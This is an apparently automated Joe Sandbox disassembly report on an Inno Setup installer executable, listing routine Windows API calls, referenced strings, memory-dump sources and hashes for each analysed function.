                                                                                  • Opcode ID: 8dc531eab56cb185ccc6b4e3d4dc8117993312f8105d37f1b8d3413acb665b4b
                                                                                  • Instruction ID: 551f0a9b7495647285bda1570a604c0631a5e02ead2406aff9c01dba3ff24079
                                                                                  • Opcode Fuzzy Hash: 8dc531eab56cb185ccc6b4e3d4dc8117993312f8105d37f1b8d3413acb665b4b
                                                                                  • Instruction Fuzzy Hash: 7B41A274A00608EFDB15DF99CD81FAEB7F9EB08714F5140A6F904E7692C6789E44CA28
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045439D,?,?,?,?), ref: 00454260
                                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00454266
                                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 004542B3
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                  • API String ID: 1914119943-2711329623
                                                                                  • Opcode ID: 61b2fe133b018f69d346f966f8365a0f363c7ad1b91ff72de2db96a4437186d1
                                                                                  • Instruction ID: 3e23d797f6fb327388363c26b96d076efffa2bd964c6cba41623d697bc2f12c2
                                                                                  • Opcode Fuzzy Hash: 61b2fe133b018f69d346f966f8365a0f363c7ad1b91ff72de2db96a4437186d1
                                                                                  • Instruction Fuzzy Hash: 30318271B00604AFC711EFAACC11E5A77B9EFC974971184A6FC04DB662D638DD45C628
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E2E1,?,?,00000000,00000000,00000000,00475D09,?,00000001,00000000,00000002,00000000,004764AA), ref: 0042E205
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E20B
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E2E1,?,?,00000000,00000000,00000000,00475D09), ref: 0042E259
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                  • API String ID: 4190037839-2401316094
                                                                                  • Opcode ID: 00d6648d3881043dc239b6173d2eb54bbb61d071253c3132a8b2ddb5b2aa3684
                                                                                  • Instruction ID: 35cee4d2ebf668902d35e7e831d79f13497649c851236a4bfbf042666705cf5c
                                                                                  • Opcode Fuzzy Hash: 00d6648d3881043dc239b6173d2eb54bbb61d071253c3132a8b2ddb5b2aa3684
                                                                                  • Instruction Fuzzy Hash: E2213730B00625EBDB11EAA2DC51B9F77ACEB45304F9044BBA501E7291D77C9E058B6C
                                                                                  APIs
                                                                                  • RectVisible.GDI32(?,?), ref: 00416D8B
                                                                                  • SaveDC.GDI32(?), ref: 00416D9F
                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DC2
                                                                                  • RestoreDC.GDI32(?,?), ref: 00416DDD
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416E5D
                                                                                  • FrameRect.USER32(?,?,?), ref: 00416E90
                                                                                  • DeleteObject.GDI32(?), ref: 00416E9A
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EAA
                                                                                  • FrameRect.USER32(?,?,?), ref: 00416EDD
                                                                                  • DeleteObject.GDI32(?), ref: 00416EE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                  • String ID:
                                                                                  • API String ID: 375863564-0
                                                                                  • Opcode ID: 240dc8a3ffdc572572d0b9f2ebf85ec89639d6ac09a30984951a245e2b3314f2
                                                                                  • Instruction ID: 153cb0d1f89258df4c214197e3775680e06e2e8b2aad404d6b6596e3604071f6
                                                                                  • Opcode Fuzzy Hash: 240dc8a3ffdc572572d0b9f2ebf85ec89639d6ac09a30984951a245e2b3314f2
                                                                                  • Instruction Fuzzy Hash: AF513D712086455FDB50EF69C880B9B77E8EF48314F1546AAFD48CB286C738EC81CB99
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B5E
                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B82
                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B9E
                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BBF
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BE8
                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BF2
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404C12
                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C29
                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C44
                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C5E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: 19aab46d14617eeb7ff55053a6d2529793c5aca4f70347c4672e535beafe550a
                                                                                  • Instruction ID: 243fc86442b20f36379e50c59261f474f5b259432ffcb65c19c30b2a18794a22
                                                                                  • Opcode Fuzzy Hash: 19aab46d14617eeb7ff55053a6d2529793c5aca4f70347c4672e535beafe550a
                                                                                  • Instruction Fuzzy Hash: 2B41B2B02093009EF7305A648905B2776E5ABC0314F208A3FE3A6F66E0D77DEC858B5D
                                                                                  APIs
                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 004221AB
                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C9
                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221D6
                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E3
                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221F0
                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221FD
                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042220A
                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422217
                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00422235
                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422251
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                  • String ID:
                                                                                  • API String ID: 3985193851-0
                                                                                  • Opcode ID: b4da6a57afd1af3d38b76973c3f985c3261a3369812f78a40767721fa1b80e27
                                                                                  • Instruction ID: 910a4946ced78324d9dd02c75bf64781bafbc8288af0414e5feb2b51686d6318
                                                                                  • Opcode Fuzzy Hash: b4da6a57afd1af3d38b76973c3f985c3261a3369812f78a40767721fa1b80e27
                                                                                  • Instruction Fuzzy Hash: 6D2144703407447AE724E724DD8BFAF7BD99B08748F1440A5B6487F2D3C2F9AA40869C
                                                                                  APIs
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  • FreeLibrary.KERNEL32(10000000), ref: 00476B14
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00476B28
                                                                                  • SendMessageA.USER32(00010482,00000496,00002710,00000000), ref: 00476B8D
                                                                                  Strings
                                                                                  • Deinitializing Setup., xrefs: 0047698A
                                                                                  • Restarting Windows., xrefs: 00476B68
                                                                                  • GetCustomSetupExitCode, xrefs: 004769C9
                                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 00476B49
                                                                                  • DeinitializeSetup, xrefs: 00476A25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary$LocalMessageSendTime
                                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                  • API String ID: 2162613394-1884538726
                                                                                  • Opcode ID: b5b7e151dc2b32874c4ce91de7a12f758ba76f63248fef1284c70de5eb8bb9fb
                                                                                  • Instruction ID: a7fe594446c77944d75f86ca3616eda1b18d009f93b2a2db331ef08aa89ebd61
                                                                                  • Opcode Fuzzy Hash: b5b7e151dc2b32874c4ce91de7a12f758ba76f63248fef1284c70de5eb8bb9fb
                                                                                  • Instruction Fuzzy Hash: 7251A134600A009FD711EB69D845B9E77A5FB4A314F61C8BFE804E72A1DB79AC48CB1D
                                                                                  APIs
                                                                                    • Part of subcall function 0042CA74: CharPrevA.USER32(?,00000000,?,00000001,?,?,0042CBA2,00000000,0042CBC8,?,00000001,?,?,00000000,?,0042CC1A), ref: 0042CA9C
                                                                                  • SHGetMalloc.SHELL32(?), ref: 0045BBDF
                                                                                  • GetActiveWindow.USER32 ref: 0045BC43
                                                                                  • CoInitialize.OLE32(00000000), ref: 0045BC57
                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 0045BC6E
                                                                                  • CoUninitialize.OLE32(0045BCAF,00000000,?,?,?,?,?,00000000,0045BD33), ref: 0045BC83
                                                                                  • SetActiveWindow.USER32(?,0045BCAF,00000000,?,?,?,?,?,00000000,0045BD33), ref: 0045BC99
                                                                                  • SetActiveWindow.USER32(?,?,0045BCAF,00000000,?,?,?,?,?,00000000,0045BD33), ref: 0045BCA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveWindow$BrowseCharFolderInitializeMallocPrevUninitialize
                                                                                  • String ID: A
                                                                                  • API String ID: 1128911707-3554254475
                                                                                  • Opcode ID: 879e8f1943f1e9409d075a3dec2b2941bf9be930441fefcd4fa6db2c4011147b
                                                                                  • Instruction ID: fea3521da9d11cdc4f0d1d629dc64e04cb0bef29935650453396e26aacfcc061
                                                                                  • Opcode Fuzzy Hash: 879e8f1943f1e9409d075a3dec2b2941bf9be930441fefcd4fa6db2c4011147b
                                                                                  • Instruction Fuzzy Hash: EE311070D002089FDB05EFA6D886A9EBBF9EF09304F51447EF814E7252D7789A04CB99
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418BE8
                                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418BF0
                                                                                  • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BF6
                                                                                    • Part of subcall function 0040993C: 6F52C400.COMCTL32((H,000000FF,00000000,00418C24,00000000,00418C80,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409940
                                                                                  • 6F59CB00.COMCTL32((H,00000000,00000000,00000000,00000000,00418C80,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C46
                                                                                  • 6F59C740.COMCTL32(00000000,?,(H,00000000,00000000,00000000,00000000,00418C80,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C51
                                                                                  • 6F59CB00.COMCTL32((H,00000001,?,?,00000000,?,(H,00000000,00000000,00000000,00000000,00418C80,?,00000000,0000000D,00000000), ref: 00418C64
                                                                                  • 6F530860.COMCTL32((H,00418C87,?,00000000,?,(H,00000000,00000000,00000000,00000000,00418C80,?,00000000,0000000D,00000000,0000000E), ref: 00418C7A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$C400C740F530860F532980
                                                                                  • String ID: (H
                                                                                  • API String ID: 209721339-1591829196
                                                                                  • Opcode ID: 5960190bb24e7d3353c84ccc2aa96bd2373cc5ba6580b5bb210e16a19b9a2767
                                                                                  • Instruction ID: 9d48606d128e7c21d1d97442ece65814aa961ad444aeb49a36dbe1afafbe1803
                                                                                  • Opcode Fuzzy Hash: 5960190bb24e7d3353c84ccc2aa96bd2373cc5ba6580b5bb210e16a19b9a2767
                                                                                  • Instruction Fuzzy Hash: 28112471744604BAEB10EBA5DC83F5EB3B8EB48704F50446EB904F72D2EA79AD40C668
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 00459BA5
                                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 00459BB5
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 00459BC5
                                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 00459BD5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                  • API String ID: 190572456-3516654456
                                                                                  • Opcode ID: b3633717f6f586b4f250b9de4e6af45a461d13c814cd33425cf497b09a6202da
                                                                                  • Instruction ID: 131e5ebd5c11df124c40758990f909dbf327b0141dd9d4d58b1908f6ef395853
                                                                                  • Opcode Fuzzy Hash: b3633717f6f586b4f250b9de4e6af45a461d13c814cd33425cf497b09a6202da
                                                                                  • Instruction Fuzzy Hash: 2E0128B0500644FAEB1ADF27AD4472E32D5E788306F10883F9B05552A7D37D0949CB5C
                                                                                  APIs
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A931
                                                                                  • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A96B
                                                                                  • SetBkColor.GDI32(?,?), ref: 0041A980
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9CA
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041A9D5
                                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9E5
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA24
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA2E
                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AA3B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$StretchText
                                                                                  • String ID:
                                                                                  • API String ID: 2984075790-0
                                                                                  • Opcode ID: 1a74402fcd621ba1fda2798bb05f0bd46cd6897a9a0d73d1381599c8ebfaa6c1
                                                                                  • Instruction ID: 21a2616a821a1a2b6cd7a03ace8ae925b9046be51d445e0b94e9b05d877b0abc
                                                                                  • Opcode Fuzzy Hash: 1a74402fcd621ba1fda2798bb05f0bd46cd6897a9a0d73d1381599c8ebfaa6c1
                                                                                  • Instruction Fuzzy Hash: E261C675A00105AFC740EFADD985E9EB7F8AF09308B14856AF518DB262C738ED41CF58
                                                                                  APIs
                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044C485
                                                                                  • GetSysColor.USER32(00000014), ref: 0044C48C
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044C4A4
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C4CD
                                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044C4D7
                                                                                  • GetSysColor.USER32(00000010), ref: 0044C4DE
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044C4F6
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C51F
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C54A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                                  • String ID:
                                                                                  • API String ID: 1005981011-0
                                                                                  • Opcode ID: 671e07e6644eb1f923cce870eb1992e4a2be202dda57c899fc094eaaa62476a3
                                                                                  • Instruction ID: 8f7f5da1cc6cda16289b22bb97cfd340c2b0c0db639dc8ccf42a5434b7bbe294
                                                                                  • Opcode Fuzzy Hash: 671e07e6644eb1f923cce870eb1992e4a2be202dda57c899fc094eaaa62476a3
                                                                                  • Instruction Fuzzy Hash: B721AFB42015146FC710FB2ECD8AE9BBBDCDF09319B04457A7954EB393C678DD408A69
                                                                                  APIs
                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00452FD4
                                                                                  • GetLastError.KERNEL32(00000000,00453055,?,?,?,00000001), ref: 00452FE5
                                                                                  • WaitForInputIdle.USER32(?,000000FF), ref: 00453004
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00453024
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00453031
                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00453055,?,?,?,00000001), ref: 0045303A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                                  • String ID: <
                                                                                  • API String ID: 35504260-4251816714
                                                                                  • Opcode ID: 8fc99e1be546e38a291961e4459e1812e93c5aeacf0af791d7f36bf14110905d
                                                                                  • Instruction ID: 1270d5b6907995f38247199539037ba6b68d133bdce922bb2f2f4ae6f80f6e1c
                                                                                  • Opcode Fuzzy Hash: 8fc99e1be546e38a291961e4459e1812e93c5aeacf0af791d7f36bf14110905d
                                                                                  • Instruction Fuzzy Hash: E9316FB0A00309ABDF10EFA5D845B9EBBB8AF04755F50413BB814E72D2D7789A05CB68
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004687E5,?,?,?,?,00000000), ref: 0046874F
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004687E5), ref: 00468766
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  • AddFontResourceA.GDI32(00000000), ref: 00468783
                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00468797
                                                                                  Strings
                                                                                  • Failed to open Fonts registry key., xrefs: 0046876D
                                                                                  • AddFontResource, xrefs: 004687A1
                                                                                  • Failed to set value in Fonts registry key., xrefs: 00468758
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFontLocalMessageNotifyOpenResourceSendTimeValue
                                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                  • API String ID: 2144475154-649663873
                                                                                  • Opcode ID: 62ae10f13b253fd7b3f454300c2a6fad5b35342ee453eb8d4b114edd3e510707
                                                                                  • Instruction ID: 804f474ae138fc4727a71d62ea58ba6b88bf13b5739a0cb0475aad4186f0cbd4
                                                                                  • Opcode Fuzzy Hash: 62ae10f13b253fd7b3f454300c2a6fad5b35342ee453eb8d4b114edd3e510707
                                                                                  • Instruction Fuzzy Hash: 1C21A7747402046BE710F6A68C42F6E779CDB45749F60457FB900FB2C2EA7CAD06866E
                                                                                  APIs
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                    • Part of subcall function 0044F5B4: SetEndOfFile.KERNEL32(?,00000000,004672F2), ref: 0044F5BB
                                                                                    • Part of subcall function 00406ED4: DeleteFileA.KERNEL32(00000000,0048E628,0048BB48,00000000,0048BB9D,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EDF
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00489E98
                                                                                  • OpenProcess.KERNEL32(001F0000,00000000,?,00000000,?), ref: 00489EA8
                                                                                  • SendMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00489EBE
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489EC6
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489ECC
                                                                                  • Sleep.KERNEL32(000001F4,00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489ED6
                                                                                  Strings
                                                                                  • Deleting Uninstall data files., xrefs: 00489E17
                                                                                  Memory Dump Source
